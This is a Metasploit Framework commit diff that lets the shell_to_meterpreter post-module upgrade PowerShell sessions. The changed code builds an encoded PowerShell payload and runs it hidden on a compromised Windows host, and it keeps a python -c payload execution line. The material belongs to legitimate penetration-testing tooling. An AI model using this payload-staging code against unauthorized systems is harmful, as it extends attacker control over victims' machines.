Land #5948, @bcook-r7's fix shell_to_meterpreter from powershell
commit
c967b60bf8
|
@ -27,6 +27,13 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
|
|||
"powershell"
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the session platform.
|
||||
#
|
||||
def platform
|
||||
"win"
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the session description.
|
||||
#
|
||||
|
@ -37,7 +44,7 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
|
|||
#
|
||||
# Takes over the shell_command of the parent
|
||||
#
|
||||
def shell_command(cmd)
|
||||
def shell_command(cmd, timeout = 1800)
|
||||
# insert random marker
|
||||
strm = Rex::Text.rand_text_alpha(15)
|
||||
endm = Rex::Text.rand_text_alpha(15)
|
||||
|
@ -45,7 +52,6 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
|
|||
# Send the shell channel's stdin.
|
||||
shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n")
|
||||
|
||||
timeout = 1800 # 30 minute timeout
|
||||
etime = ::Time.now.to_f + timeout
|
||||
|
||||
buff = ""
|
||||
|
|
|
@ -147,7 +147,6 @@ module Exploit::Powershell
|
|||
# @param ps_code [String] Powershell code
|
||||
# @param payload_arch [String] The payload architecture 'x86'/'x86_64'
|
||||
# @param encoded [Boolean] Indicates whether ps_code is encoded or not
|
||||
#
|
||||
# @return [String] Wrapped powershell code
|
||||
def run_hidden_psh(ps_code, payload_arch, encoded)
|
||||
arg_opts = {
|
||||
|
|
|
@ -198,6 +198,13 @@ module Msf::Post::Common
|
|||
end
|
||||
|
||||
process.close
|
||||
when /powershell/
|
||||
if args.nil? || args.empty?
|
||||
o = session.shell_command("#{cmd}", time_out)
|
||||
else
|
||||
o = session.shell_command("#{cmd} #{args}", time_out)
|
||||
end
|
||||
o.chomp! if o
|
||||
when /shell/
|
||||
if args.nil? || args.empty?
|
||||
o = session.shell_command_token("#{cmd}", time_out)
|
||||
|
|
|
@ -1921,12 +1921,12 @@ class Core
|
|||
session.response_timeout = response_timeout
|
||||
end
|
||||
begin
|
||||
if session.type == 'shell'
|
||||
if ['shell', 'powershell'].include?(session.type)
|
||||
session.init_ui(driver.input, driver.output)
|
||||
session.execute_script('post/multi/manage/shell_to_meterpreter')
|
||||
session.reset_ui
|
||||
else
|
||||
print_error("Session #{sess_id} is not a command shell session, skipping...")
|
||||
print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...")
|
||||
next
|
||||
end
|
||||
ensure
|
||||
|
|
|
@ -128,6 +128,27 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
case platform
|
||||
when 'win'
|
||||
if session.type == 'powershell'
|
||||
template_path = File.join(Msf::Config.data_directory, 'templates', 'scripts')
|
||||
psh_payload = case datastore['Powershell::method']
|
||||
when 'net'
|
||||
Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload_data)
|
||||
when 'reflection'
|
||||
Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload_data)
|
||||
when 'old'
|
||||
Rex::Powershell::Payload.to_win32pe_psh(template_path, payload_data)
|
||||
when 'msil'
|
||||
fail RuntimeError, 'MSIL Powershell method no longer exists'
|
||||
else
|
||||
fail RuntimeError, 'No Powershell method specified'
|
||||
end
|
||||
|
||||
# prepend_sleep => 1
|
||||
psh_payload = 'Start-Sleep -s 1;' << psh_payload
|
||||
|
||||
encoded_psh_payload = encode_script(psh_payload)
|
||||
cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true))
|
||||
else # shell
|
||||
if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
|
||||
vprint_status("Transfer method: Powershell")
|
||||
psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
|
||||
|
@ -138,6 +159,7 @@ class Metasploit3 < Msf::Post
|
|||
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
|
||||
aborted = transmit_payload(exe)
|
||||
end
|
||||
end
|
||||
when 'python'
|
||||
vprint_status("Transfer method: Python")
|
||||
cmd_exec("python -c \"#{payload_data}\"")
|
||||
|
|
Loading…
Reference in New Issue